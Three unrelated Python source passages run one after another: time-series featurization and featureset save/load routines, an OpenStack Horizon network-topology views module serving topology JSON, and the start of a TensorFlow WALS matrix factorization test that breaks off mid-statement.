    - `errors`: (n,) array or (p, n) array (for p channels of measurement)

    For multiple time series, inputs may have the form:

    - `times`: list of (n,) arrays, list of (p, n) arrays (for p channels of
      measurement), or list of lists of (n,) arrays (for
      multichannel data with different time values per channel)
    - `values`: list of (n,) arrays, list of (p, n) arrays (for p channels of
      measurement), or list of lists of (n,) arrays (for
      multichannel data with different time values per channel)
    - `errors`: list of (n,) arrays, list of (p, n) arrays (for p channels of
      measurement), or list of lists of (n,) arrays (for
      multichannel data with different time values per channel)

    In the case of multichannel measurements, each channel will be
    featurized separately, and the index of the output featureset will contain
    a `channel` coordinate.

    Parameters
    ----------
    times : array, list of array, or list of lists of array
        Array containing time values for a single time series, or a list of
        arrays each containing time values for a single time series, or a list
        of lists of arrays for multichannel data with different time values per
        channel
    values : array or list of array
        Array containing measurement values for a single time series, or a list
        of arrays each containing (possibly multivariate) measurement values
        for a single time series, or a list of lists of arrays for multichannel
        data with different time values per channel
    errors : array or list/tuple of array, optional
        Array containing measurement error values for a single time series, or
        a list of arrays each containing (possibly multivariate) measurement
        values for a single time series, or a list of lists of arrays for
        multichannel data with different time values per channel
    features_to_use : list of str, optional
        List of feature names to be generated. Defaults to None, treated as an
        empty list, which will result in only meta_features features being
        stored.
    meta_features : dict/Pandas.Series or list of dicts/Pandas.DataFrame, optional
        dict/Series (for a single time series) or DataFrame (for multiple time
        series) of metafeature information; features are added to the output
        featureset, and their values are consumable by custom feature scripts.
        Defaults to None (no metafeatures).
    names : str or list of str, optional
        Name or list of names for each time series, if applicable; will be
        stored in the (row) index of the featureset.
    custom_script_path : str, optional
        Path to Python script containing function definitions for the
        generation of any custom features. Defaults to None.
    custom_functions : dict, optional
        Dictionary of custom feature functions to be evaluated for the given
        time series, or a dictionary representing a dask graph of function
        evaluations. Dictionaries of functions should have keys `feature_name`
        and values functions that take arguments (t, m, e); in the case of a
        dask graph, these arrays should be referenced as 't', 'm', 'e',
        respectively, and any values with keys present in `features_to_use`
        will be computed.
    scheduler : function, optional
        `dask` scheduler function used to perform feature extraction
        computation. Defaults to `dask.threaded.get`.
    raise_exceptions : bool, optional
        If True, exceptions during feature computation are raised immediately;
        if False, exceptions are supressed and `np.nan` is returned for the
        given feature and any dependent features. Defaults to True.

    Returns
    -------
    pd.DataFrame
        DataFrame with columns containing feature values, indexed by name.
    """
    # Bug-risk fix: the previous signature used mutable default arguments
    # (features_to_use=[], meta_features={}); use None sentinels instead so no
    # state can leak between calls. Callers passing values are unaffected.
    if features_to_use is None:
        features_to_use = []
    if meta_features is None:
        meta_features = {}

    # Missing times: substitute uniform sampling grids of matching shape.
    if times is None:
        times = copy.deepcopy(values)
        if isinstance(times, np.ndarray) and (times.ndim == 1
                                              or 1 in times.shape):
            times[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
                                   times.size)
        else:
            for t in times:
                if isinstance(t, np.ndarray) and (t.ndim == 1 or 1 in t.shape):
                    t[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
                                       t.size)
                else:
                    for t_i in t:
                        t_i[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
                                             t_i.size)

    # Missing errors: substitute a constant default error of matching shape.
    if errors is None:
        errors = copy.deepcopy(values)
        if isinstance(errors, np.ndarray) and (errors.ndim == 1
                                               or 1 in errors.shape):
            errors[:] = time_series.DEFAULT_ERROR_VALUE
        else:
            for e in errors:
                if isinstance(e, np.ndarray) and (e.ndim == 1 or 1 in e.shape):
                    e[:] = time_series.DEFAULT_ERROR_VALUE
                else:
                    for e_i in e:
                        e_i[:] = time_series.DEFAULT_ERROR_VALUE

    # Normalize the single-time-series cases to lists of time series.
    # One single-channel time series:
    if not isinstance(values[0], Iterable):
        times, values, errors = [times], [values], [errors]
    # One multi-channel time series:
    elif isinstance(values, np.ndarray) and values.ndim == 2:
        times, values, errors = [times], [values], [errors]

    if names is None:
        names = np.arange(len(times))

    if isinstance(meta_features, pd.Series):
        meta_features = meta_features.to_dict()
    meta_features = pd.DataFrame(meta_features, index=names)

    # Build a lazy dask pipeline: one TimeSeries + featurization per input,
    # gathered by assemble_featureset.
    all_time_series = [delayed(TimeSeries(t, m, e,
                                          meta_features=meta_features.loc[name],
                                          name=name), pure=True)
                       for t, m, e, name in zip(times, values, errors, names)]
    all_features = [delayed(featurize_single_ts, pure=True)(ts, features_to_use,
                                                            custom_script_path,
                                                            custom_functions,
                                                            raise_exceptions)
                    for ts in all_time_series]
    result = delayed(assemble_featureset, pure=True)(all_features, all_time_series)
    # NOTE(review): `.compute(get=scheduler)` is the pre-0.19 dask API; newer
    # dask expects `scheduler=` -- confirm against the pinned dask version.
    return result.compute(get=scheduler)
def featurize_ts_files(ts_paths, features_to_use, custom_script_path=None,
                       custom_functions=None, scheduler=dask.threaded.get,
                       raise_exceptions=True):
    """Feature generation function for on-disk time series (.npz) files.

    By default, computes features concurrently using the
    `dask.threaded.get` scheduler. Other possible options include
    `dask.local.get` for synchronous computation (e.g., when debugging),
    or `dask.distributed.Executor.get` for distributed computation.

    In the case of multichannel measurements, each channel will be
    featurized separately, and the index of the output featureset will contain
    a `channel` coordinate.

    Parameters
    ----------
    ts_paths : list of str
        List of paths to time series data, stored in `numpy` .npz format.
        See `time_series.load` for details.
    features_to_use : list of str, optional
        List of feature names to be generated. Defaults to an empty list, which
        will result in only meta_features features being stored.
    custom_script_path : str, optional
        Path to Python script containing function definitions for the
        generation of any custom features. Defaults to None.
    custom_functions : dict, optional
        Dictionary of custom feature functions to be evaluated for the given
        time series, or a dictionary representing a dask graph of function
        evaluations. Dictionaries of functions should have keys `feature_name`
        and values functions that take arguments (t, m, e); in the case of a
        dask graph, these arrays should be referenced as 't', 'm', 'e',
        respectively, and any values with keys present in `features_to_use`
        will be computed.
    scheduler : function, optional
        `dask` scheduler function used to perform feature extraction
        computation. Defaults to `dask.threaded.get`.
    raise_exceptions : bool, optional
        If True, exceptions during feature computation are raised immediately;
        if False, exceptions are suppressed and `np.nan` is returned for the
        given feature and any dependent features. Defaults to True.

    Returns
    -------
    pd.DataFrame
        DataFrame with columns containing feature values, indexed by name.
    """
    # Defer loading from disk so the dask scheduler can overlap file I/O
    # with feature computation across time series.
    all_time_series = [delayed(time_series.load, pure=True)(ts_path)
                       for ts_path in ts_paths]
    # One lazy featurization task per time series; nothing executes until
    # `dask.compute` below.
    all_features = [delayed(featurize_single_ts, pure=True)(ts, features_to_use,
                                                            custom_script_path,
                                                            custom_functions,
                                                            raise_exceptions)
                    for ts in all_time_series]
    # NOTE: attribute access on a dask `Delayed` object yields another
    # Delayed, so these name/meta/label accesses also remain lazy.
    names, meta_feats, all_labels = zip(*[(ts.name, ts.meta_features, ts.label)
                                          for ts in all_time_series])
    result = delayed(assemble_featureset, pure=True)(all_features,
                                                     meta_features_list=meta_feats,
                                                     names=names)
    # Evaluate the featureset and the labels in a single pass of the graph.
    fset, labels = dask.compute(result, all_labels, get=scheduler)
    return fset, labels
def impute_featureset(fset, strategy='constant', value=None, max_value=1e20,
                      inplace=False):
    """Replace NaN/Inf values with imputed values as defined by `strategy`.

    Output should satisfy `sklearn.validation.assert_all_finite` so that
    training a model will not produce an error.

    Parameters
    ----------
    fset : pd.DataFrame
        Feature data frame to be imputed.
    strategy : str, optional
        The imputation strategy. Defaults to 'constant'.

        - 'constant': replace all missing with `value`
        - 'mean': replace all missing with mean along `axis`
        - 'median': replace all missing with median along `axis`
        - 'most_frequent': replace all missing with mode along `axis`
    value : float or None, optional
        Replacement value to use for `strategy='constant'`. Defaults to
        `None`, in which case a very large negative value is used (a
        good choice for e.g. random forests).
    max_value : float, optional
        Maximum (absolute) value above which values are treated as infinite.
        Used to prevent overflow when fitting `sklearn` models.
    inplace : bool, optional
        If True, fill in place. If False, return a copy.

    Returns
    -------
    pd.DataFrame
        Feature data frame with no missing/infinite values.
    """
    if not inplace:
        fset = fset.copy()
    # Map NaNs to inf first so the magnitude comparison below does not emit
    # NaN-comparison warnings; anything too large (including those infs)
    # then becomes NaN and is imputed by the chosen strategy.
    fset.values[np.isnan(fset.values)] = np.inf
    fset.values[np.abs(fset.values) > max_value] = np.nan
    if strategy == 'constant':
        if value is None:
            # If no fill-in value is provided, use a large negative value
            value = -2. * np.nanmax(np.abs(fset.values))
        fset.fillna(value, inplace=True)
    elif strategy in ('mean', 'median', 'most_frequent'):
        imputer = Imputer(strategy=strategy, axis=0)
        fset.values[:] = imputer.fit_transform(fset.values)
    else:
        # BUG FIX: the two adjacent string literals previously concatenated
        # without a space, producing "notrecognized" in the message.
        raise NotImplementedError("Imputation strategy '{}' not "
                                  "recognized.".format(strategy))
    return fset
def save_featureset(fset, path, **kwargs):
    """Save feature DataFrame in .npz format.

    Can optionally store class labels/targets and other metadata. All other
    keyword arguments will be passed on to `np.savez`; data frames are saved as
    record arrays and converted back into data frames by `load_featureset`.

    Parameters
    ----------
    fset : pd.DataFrame
        Feature data frame to be saved.
    path : str
        Path to store feature data.
    kwargs : dict of array or data frame
        Additional keyword arguments, e.g.:
        labels -> class labels
        preds -> predicted class labels
        pred_probs -> (n_sample, n_class) data frame of class probabilities
    """
    # Transpose to properly handle MultiIndex columns
    kwargs['features'] = fset.T
    for k, v in kwargs.items():
        if isinstance(v, pd.DataFrame):
            arr = v.to_records()
            dt_list = arr.dtype.descr
            # Object dtypes cannot be saved without pickling, so convert each
            # object-typed field to a fixed-width unicode type wide enough for
            # its longest entry.
            for i, (name, dt) in enumerate(dt_list):
                if dt.endswith('O'):
                    # BUG FIX: previously the width was always computed from
                    # arr['index'], truncating any other object-typed column
                    # whose strings are longer than the index entries.
                    size = max(len(x) for x in arr[name])
                    dt_list[i] = (name, 'U' + str(size))
                dt_list[i] = (str(name),) + dt_list[i][1:]  # avoid Py2 unicode
            kwargs[k] = arr.astype(dt_list)
        # Ignore null values, e.g. for unlabeled data
        if all(el is None for el in v):
            kwargs[k] = []
    # Bypass savez to allow for `allow_pickle` keyword
    # See https://github.com/numpy/numpy/pull/5770
    np.lib.npyio._savez(path, [], kwargs, compress=True, allow_pickle=False)
def load_featureset(path):
    """Load feature DataFrame from .npz file.

    Feature information is returned as a single DataFrame, while any other
    arrays that were saved (class labels/predictions, etc.) are returned in a
    single dictionary.

    Parameters
    ----------
    path : str
        Path where feature data is stored.

    Returns
    -------
    pd.DataFrame
        Loaded feature data frame.
    dict
        Additional variables passed to `save_featureset`, including labels, etc.
    """
    with np.load(path, allow_pickle=False) as npz_file:
        contents = dict(npz_file)
    # Features were stored transposed (see `save_featureset`) so that
    # MultiIndex columns survive the record-array round trip.
    fset = pd.DataFrame.from_records(contents.pop('features'),
                                     index=['feature', 'channel']).T
    feature_names, channel_ids = zip(*fset.columns)
    # Channel identifiers are stored as strings/ints; restore integer ids
    # while keeping the empty-string marker for single-channel data.
    channel_ids = ['' if cid == '' else int(cid) for cid in channel_ids]
    fset.columns = pd.MultiIndex.from_tuples(
        list(zip(feature_names, channel_ids)), names=['feature', 'channel'])
    # Structured (record) arrays were data frames originally; plain arrays
    # pass through unchanged.
    for key, arr in contents.items():
        if len(arr.dtype) > 0:
            contents[key] = pd.DataFrame.from_records(arr, index='index')
    return fset, contents
| |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2013 NTT MCL Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.conf import settings
from django.http import HttpResponse
from django.urls import reverse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import View
from horizon import exceptions
from horizon import tabs
from horizon.utils.lazy_encoder import LazyTranslationEncoder
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.network_topology import forms
from openstack_dashboard.dashboards.project.network_topology.instances \
import tables as instances_tables
from openstack_dashboard.dashboards.project.network_topology.networks \
import tables as networks_tables
from openstack_dashboard.dashboards.project.network_topology.ports \
import tables as ports_tables
from openstack_dashboard.dashboards.project.network_topology.routers \
import tables as routers_tables
from openstack_dashboard.dashboards.project.network_topology.subnets \
import tables as subnets_tables
from openstack_dashboard.dashboards.project.network_topology \
import tabs as topology_tabs
from openstack_dashboard.dashboards.project.network_topology import utils
from openstack_dashboard.dashboards.project.instances.tables import \
STATUS_DISPLAY_CHOICES as instance_choices
from openstack_dashboard.dashboards.project.instances import\
views as i_views
from openstack_dashboard.dashboards.project.instances.workflows import\
create_instance as i_workflows
from openstack_dashboard.dashboards.project.networks.subnets import\
views as s_views
from openstack_dashboard.dashboards.project.networks.subnets import\
workflows as s_workflows
from openstack_dashboard.dashboards.project.networks.tables import \
DISPLAY_CHOICES as network_display_choices
from openstack_dashboard.dashboards.project.networks.tables import \
STATUS_DISPLAY_CHOICES as network_choices
from openstack_dashboard.dashboards.project.networks import\
views as n_views
from openstack_dashboard.dashboards.project.networks import\
workflows as n_workflows
from openstack_dashboard.dashboards.project.routers.ports.tables import \
DISPLAY_CHOICES as ports_choices
from openstack_dashboard.dashboards.project.routers.ports.tables import \
STATUS_DISPLAY_CHOICES as ports_status_choices
from openstack_dashboard.dashboards.project.routers.ports import\
views as p_views
from openstack_dashboard.dashboards.project.routers.tables import \
ADMIN_STATE_DISPLAY_CHOICES as routers_admin_choices
from openstack_dashboard.dashboards.project.routers.tables import \
STATUS_DISPLAY_CHOICES as routers_status_choices
from openstack_dashboard.dashboards.project.routers import\
views as r_views
from openstack_dashboard import policy
# List of known server statuses that won't connect to the console
console_invalid_status = {
    'shutoff', 'suspended', 'resize', 'verify_resize',
    'revert_resize', 'migrating', 'build', 'shelved',
    'shelved_offloaded'}
class TranslationHelper(object):
    """Helper class to provide the translations.

    This allows the network topology to access the translated strings
    for various resources defined in other parts of the code.
    """
    def __init__(self):
        def merge(*choice_tuples):
            # Flatten one or more (key, label) choice tuples into a single
            # dict, normalizing keys to upper case for uniform lookups.
            merged = {}
            for choices in choice_tuples:
                merged.update(dict(choices))
            return {key.upper(): label for key, label in merged.items()}

        self.instance = merge(instance_choices)
        self.network = merge(network_choices, network_display_choices)
        self.router = merge(routers_admin_choices, routers_status_choices)
        self.port = merge(ports_choices, ports_status_choices)
class NTAddInterfaceView(p_views.AddInterfaceView):
    """Add-interface view that always returns to the topology page."""
    success_url = "horizon:project:network_topology:index"
    failure_url = "horizon:project:network_topology:index"

    def get_success_url(self):
        # Redirect back to the topology index once the interface is added.
        return reverse("horizon:project:network_topology:index")

    def get_context_data(self, **kwargs):
        ctx = super(NTAddInterfaceView, self).get_context_data(**kwargs)
        # Point the form at the topology-specific interface endpoint.
        ctx['form_url'] = 'horizon:project:network_topology:interface'
        return ctx
class NTCreateRouterView(r_views.CreateView):
    """Create-router view embedded in the network topology page."""
    form_class = forms.NTCreateRouterForm
    success_url = reverse_lazy("horizon:project:network_topology:index")
    submit_url = reverse_lazy("horizon:project:network_topology:createrouter")
    page_title = _("Create a Router")
class NTCreateNetwork(n_workflows.CreateNetwork):
    """Create-network workflow that returns to the topology page on both
    success and failure."""
    def get_success_url(self):
        return reverse("horizon:project:network_topology:index")

    def get_failure_url(self):
        return reverse("horizon:project:network_topology:index")
class NTCreateNetworkView(n_views.CreateView):
    """Create-network view wired to the topology-aware workflow."""
    workflow_class = NTCreateNetwork
class NTLaunchInstance(i_workflows.LaunchInstance):
    """Launch-instance workflow that redirects back to the topology page."""
    success_url = "horizon:project:network_topology:index"
class NTLaunchInstanceView(i_views.LaunchInstanceView):
    """Launch-instance view wired to the topology-aware workflow."""
    workflow_class = NTLaunchInstance
class NTCreateSubnet(s_workflows.CreateSubnet):
    """Create-subnet workflow that returns to the topology page on both
    success and failure."""
    def get_success_url(self):
        return reverse("horizon:project:network_topology:index")

    def get_failure_url(self):
        return reverse("horizon:project:network_topology:index")
class NTCreateSubnetView(s_views.CreateView):
    """Create-subnet view wired to the topology-aware workflow."""
    workflow_class = NTCreateSubnet
class InstanceView(i_views.IndexView):
    """Single-instance table rendered inside the topology iframe."""
    table_class = instances_tables.InstancesTable
    template_name = 'project/network_topology/iframe.html'

    def get_data(self):
        self._more = False
        # The topology page links to one instance at a time via the ``id``
        # query parameter; return it as a one-element list, or an empty
        # list (after reporting the error) if retrieval fails.
        try:
            server_id = self.request.GET.get("id", "")
            return [api.nova.server_get(self.request, server_id)]
        except Exception:
            exceptions.handle(self.request,
                              _('Unable to retrieve the instance.'))
            return []
class RouterView(r_views.IndexView):
    """Routers table rendered inside the topology iframe."""
    table_class = routers_tables.RoutersTable
    template_name = 'project/network_topology/iframe.html'
class NetworkView(n_views.IndexView):
    """Networks table rendered inside the topology iframe."""
    table_class = networks_tables.NetworksTable
    template_name = 'project/network_topology/iframe.html'
class RouterDetailView(r_views.DetailView):
    """Router detail (ports table only) rendered inside the topology iframe."""
    table_classes = (ports_tables.PortsTable, )
    template_name = 'project/network_topology/iframe.html'

    def get_interfaces_data(self):
        # Deliberately returns nothing: the iframe variant does not render
        # the interfaces table data.
        pass
class NetworkDetailView(n_views.DetailView):
    """Network detail (subnets table only) rendered inside the topology
    iframe."""
    table_classes = (subnets_tables.SubnetsTable, )
    template_name = 'project/network_topology/iframe.html'
class NetworkTopologyView(tabs.TabView):
    """Main network-topology page, composed of the topology tab group."""
    tab_group_class = topology_tabs.TopologyTabs
    template_name = 'project/network_topology/index.html'
    page_title = _("Network Topology")

    def get_context_data(self, **kwargs):
        base_context = super(NetworkTopologyView,
                             self).get_context_data(**kwargs)
        # Let the shared utility augment the context with topology data.
        return utils.get_context(self.request, base_context)
class JSONView(View):
    """Serve the network-topology data as a single JSON document.

    Collects the servers, networks, ports, and routers visible to the
    current tenant and returns them in the shape consumed by the
    client-side topology renderer.
    """

    # Shared lookup tables mapping resource status strings to translations.
    trans = TranslationHelper()

    @property
    def is_router_enabled(self):
        # Routers are shown unless explicitly disabled via
        # OPENSTACK_NEUTRON_NETWORK['enable_router'] in settings.
        network_config = getattr(settings, 'OPENSTACK_NEUTRON_NETWORK', {})
        return network_config.get('enable_router', True)

    def add_resource_url(self, view, resources):
        """Attach a detail-page URL to each resource owned by this tenant."""
        tenant_id = self.request.user.tenant_id
        for resource in resources:
            # Skip resources owned by other tenants (e.g. shared/external
            # networks) -- no detail link is added for those.
            if (resource.get('tenant_id') and
                    tenant_id != resource.get('tenant_id')):
                continue
            resource['url'] = reverse(view, None, [str(resource['id'])])

    def _check_router_external_port(self, ports, router_id, network_id):
        """Return True if `ports` contains the router's port on `network_id`."""
        for port in ports:
            if (port['network_id'] == network_id and
                    port['device_id'] == router_id):
                return True
        return False

    def _get_servers(self, request):
        """Return a list of instance dicts for the topology diagram."""
        # Get nova data
        try:
            servers, more = api.nova.server_list(request)
        except Exception:
            # Best effort: an unreachable nova just yields an empty diagram.
            servers = []
        data = []
        console_type = getattr(settings, 'CONSOLE_TYPE', 'AUTO')
        # lowercase of the keys will be used at the end of the console URL.
        for server in servers:
            server_data = {'name': server.name,
                           'status': self.trans.instance[server.status],
                           'original_status': server.status,
                           'task': getattr(server, 'OS-EXT-STS:task_state'),
                           'id': server.id}
            # Avoid doing extra calls for console if the server is in
            # an invalid status for console connection
            if server.status.lower() not in console_invalid_status:
                if console_type:
                    server_data['console'] = 'auto_console'
            data.append(server_data)
        self.add_resource_url('horizon:project:instances:detail', data)
        return data

    def _get_networks(self, request):
        """Return tenant networks plus external (public) networks."""
        # Get neutron data
        # If we didn't specify tenant_id, all networks would be shown as for
        # an admin user, so we need to filter the networks by tenant.
        # However there is no need to specify tenant_id for subnets: the
        # subnets belonging to the public network are needed to draw subnet
        # information on the public network.
        try:
            # NOTE(amotoki):
            # To support auto allocated network in the network topology view,
            # we need to handle the auto allocated network which haven't been
            # created yet. The current network topology logic cannot handle
            # fake network ID properly, so we temporarily exclude
            # pre-auto-allocated-network from the network topology view.
            # It would be nice if someone is interested in supporting it.
            neutron_networks = api.neutron.network_list_for_tenant(
                request,
                request.user.tenant_id,
                include_pre_auto_allocate=False)
        except Exception:
            neutron_networks = []
        networks = []
        for network in neutron_networks:
            # Record whether the current user may delete subnets so the UI
            # can enable/disable the action client-side.
            allow_delete_subnet = policy.check(
                (("network", "delete_subnet"),),
                request,
                target={'network:tenant_id': getattr(network,
                                                     'tenant_id', None)}
            )
            obj = {'name': network.name_or_id,
                   'id': network.id,
                   'subnets': [{'id': subnet.id,
                                'cidr': subnet.cidr}
                               for subnet in network.subnets],
                   'status': self.trans.network[network.status],
                   'allow_delete_subnet': allow_delete_subnet,
                   'original_status': network.status,
                   'router:external': network['router:external']}
            self.add_resource_url('horizon:project:networks:subnets:detail',
                                  obj['subnets'])
            networks.append(obj)

        # Add public networks to the networks list
        if self.is_router_enabled:
            try:
                neutron_public_networks = api.neutron.network_list(
                    request,
                    **{'router:external': True})
            except Exception:
                neutron_public_networks = []
            my_network_ids = [net['id'] for net in networks]
            for publicnet in neutron_public_networks:
                # Tenant-visible networks already collected above win.
                if publicnet.id in my_network_ids:
                    continue
                try:
                    subnets = [{'id': subnet.id,
                                'cidr': subnet.cidr}
                               for subnet in publicnet.subnets]
                    self.add_resource_url(
                        'horizon:project:networks:subnets:detail', subnets)
                except Exception:
                    subnets = []
                networks.append({
                    'name': publicnet.name_or_id,
                    'id': publicnet.id,
                    'subnets': subnets,
                    'status': self.trans.network[publicnet.status],
                    'original_status': publicnet.status,
                    'router:external': publicnet['router:external']})

        self.add_resource_url('horizon:project:networks:detail',
                              networks)
        # External networks first so they render at the top of the diagram.
        return sorted(networks,
                      key=lambda x: x.get('router:external'),
                      reverse=True)

    def _get_routers(self, request):
        """Return tenant routers, or [] when routers are disabled."""
        if not self.is_router_enabled:
            return []
        try:
            neutron_routers = api.neutron.router_list(
                request,
                tenant_id=request.user.tenant_id)
        except Exception:
            neutron_routers = []

        routers = [{'id': router.id,
                    'name': router.name_or_id,
                    'status': self.trans.router[router.status],
                    'original_status': router.status,
                    'external_gateway_info': router.external_gateway_info}
                   for router in neutron_routers]
        self.add_resource_url('horizon:project:routers:detail', routers)
        return routers

    def _get_ports(self, request, networks):
        """Return ports attached to the given (visible) networks."""
        try:
            neutron_ports = api.neutron.port_list(request)
        except Exception:
            neutron_ports = []

        # we should filter out ports connected to non tenant networks
        # which they have no visibility to
        tenant_network_ids = [network['id'] for network in networks]
        ports = [{'id': port.id,
                  'network_id': port.network_id,
                  'device_id': port.device_id,
                  'fixed_ips': port.fixed_ips,
                  'device_owner': port.device_owner,
                  'status': self.trans.port[port.status],
                  'original_status': port.status}
                 for port in neutron_ports
                 if (port.device_owner != 'network:router_ha_interface' and
                     port.network_id in tenant_network_ids)]
        self.add_resource_url('horizon:project:networks:ports:detail',
                              ports)
        return ports

    def _prepare_gateway_ports(self, routers, ports):
        """Synthesize gateway ports so router-to-external links can be drawn."""
        # user can't see port on external network. so we are
        # adding fake port based on router information
        for router in routers:
            external_gateway_info = router.get('external_gateway_info')
            if not external_gateway_info:
                continue
            external_network = external_gateway_info.get(
                'network_id')
            if not external_network:
                continue
            # A real (visible) port already connects this router to the
            # external network: no fake port needed.
            if self._check_router_external_port(ports,
                                                router['id'],
                                                external_network):
                continue
            fake_port = {'id': 'gateway%s' % external_network,
                         'network_id': external_network,
                         'device_id': router['id'],
                         'fixed_ips': []}
            ports.append(fake_port)

    def get(self, request, *args, **kwargs):
        """Assemble all topology data and return it as a JSON response."""
        networks = self._get_networks(request)
        data = {'servers': self._get_servers(request),
                'networks': networks,
                'ports': self._get_ports(request, networks),
                'routers': self._get_routers(request)}
        self._prepare_gateway_ports(data['routers'], data['ports'])
        # LazyTranslationEncoder resolves the lazy translated status strings.
        json_string = json.dumps(data, cls=LazyTranslationEncoder,
                                 ensure_ascii=False)
        return HttpResponse(json_string, content_type='text/json')
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for WALSMatrixFactorization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import json
import numpy as np
from tensorflow.contrib.factorization.python.ops import factorization_ops_test_utils
from tensorflow.contrib.factorization.python.ops import wals as wals_lib
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import input as input_lib
from tensorflow.python.training import monitored_session
class WALSMatrixFactorizationTest(test.TestCase):
INPUT_MATRIX = factorization_ops_test_utils.INPUT_MATRIX
def np_array_to_sparse(self, np_array):
"""Transforms an np.array to a tf.SparseTensor."""
return factorization_ops_test_utils.np_matrix_to_tf_sparse(np_array)
def calculate_loss(self):
"""Calculates the loss of the current (trained) model."""
current_rows = embedding_ops.embedding_lookup(
self._model.get_row_factors(), math_ops.range(self._num_rows),
partition_strategy='div')
current_cols = embedding_ops.embedding_lookup(
self._model.get_col_factors(), math_ops.range(self._num_cols),
partition_strategy='div')
row_wts = embedding_ops.embedding_lookup(
self._row_weights, math_ops.range(self._num_rows),
partition_strategy='div')
col_wts = embedding_ops.embedding_lookup(
self._col_weights, math_ops.range(self._num_cols),
partition_strategy='div')
sp_inputs = self.np_array_to_sparse(self.INPUT_MATRIX)
return factorization_ops_test_utils.calculate_loss(
sp_inputs, current_rows, current_cols, self._regularization_coeff,
self._unobserved_weight, row_wts, col_wts)
# TODO(walidk): Replace with input_reader_utils functions once open sourced.
def remap_sparse_tensor_rows(self, sp_x, row_ids, shape):
"""Remaps the row ids of a tf.SparseTensor."""
old_row_ids, old_col_ids = array_ops.split(
value=sp_x.indices, num_or_size_splits=2, axis=1)
new_row_ids = array_ops.gather(row_ids, old_row_ids)
new_indices = array_ops.concat([new_row_ids, old_col_ids], 1)
return sparse_tensor.SparseTensor(
indices=new_indices, values=sp_x.values, dense_shape=shape)
# TODO(walidk): Add an option to shuffle inputs.
def input_fn(self, np_matrix, batch_size, mode,
project_row=None, projection_weights=None,
remove_empty_rows_columns=False):
"""Returns an input_fn that selects row and col batches from np_matrix.
This simple utility creates an input function from a numpy_array. The
following transformations are performed:
* The empty rows and columns in np_matrix are removed (if
remove_empty_rows_columns is true)
* np_matrix is converted to a SparseTensor.
* The rows of the sparse matrix (and the rows of its transpose) are batched.
* A features dictionary is created, which contains the row / column batches.
In TRAIN mode, one only needs to specify the np_matrix and the batch_size.
In INFER and EVAL modes, one must also provide project_row, a boolean which
specifies whether we are projecting rows or columns.
Args:
np_matrix: A numpy array. The input matrix to use.
batch_size: Integer.
mode: Can be one of model_fn.ModeKeys.{TRAIN, INFER, EVAL}.
project_row: A boolean. Used in INFER and EVAL modes. Specifies whether
to project rows or columns.
projection_weights: A float numpy array. Used in INFER mode. Specifies
the weights to use in the projection (the weights are optional, and
default to 1.).
remove_empty_rows_columns: A boolean. When true, this will remove empty
rows and columns in the np_matrix. Note that this will result in
modifying the indices of the input matrix. The mapping from new indices
to old indices is returned in the form of two numpy arrays.
Returns:
A tuple consisting of:
_fn: A callable. Calling _fn returns a features dict.
nz_row_ids: A numpy array of the ids of non-empty rows, such that
nz_row_ids[i] is the old row index corresponding to new index i.
nz_col_ids: A numpy array of the ids of non-empty columns, such that
nz_col_ids[j] is the old column index corresponding to new index j.
"""
if remove_empty_rows_columns:
np_matrix, nz_row_ids, nz_col_ids = (
factorization_ops_test_utils.remove_empty_rows_columns(np_matrix))
else:
nz_row_ids = np.arange(np.shape(np_matrix)[0])
nz_col_ids = np.arange(np.shape(np_matrix)[1])
def extract_features(row_batch, col_batch, num_rows, num_cols):
row_ids = row_batch[0]
col_ids = col_batch[0]
rows = self.remap_sparse_tensor_rows(
row_batch[1], row_ids, shape=[num_rows, num_cols])
cols = self.remap_sparse_tensor_rows(
col_batch[1], col_ids, shape=[num_cols, num_rows])
features = {
wals_lib.WALSMatrixFactorization.INPUT_ROWS: rows,
wals_lib.WALSMatrixFactorization.INPUT_COLS: cols,
}
return features
def _fn():
num_rows = np.shape(np_matrix)[0]
num_cols = np.shape(np_matrix)[1]
row_ids = math_ops.range(num_rows, dtype=dtypes.int64)
col_ids = math_ops.range(num_cols, dtype=dtypes.int64)
sp_mat = self.np_array_to_sparse(np_matrix)
sp_mat_t = sparse_ops.sparse_transpose(sp_mat)
row_batch = input_lib.batch(
[row_ids, sp_mat],
batch_size=min(batch_size, num_rows),
capacity=10,
enqueue_many=True)
col_batch = input_lib.batch(
[col_ids, sp_mat_t],
batch_size=min(batch_size, num_cols),
capacity=10,
enqueue_many=True)
features = extract_features(row_batch, col_batch, num_rows, num_cols)
if mode == model_fn.ModeKeys.INFER or mode == model_fn.ModeKeys.EVAL:
self.assertTrue(
project_row is not None,
msg='project_row must be specified in INFER or EVAL mode.')
features[wals_lib.WALSMatrixFactorization.PROJECT_ROW] = (
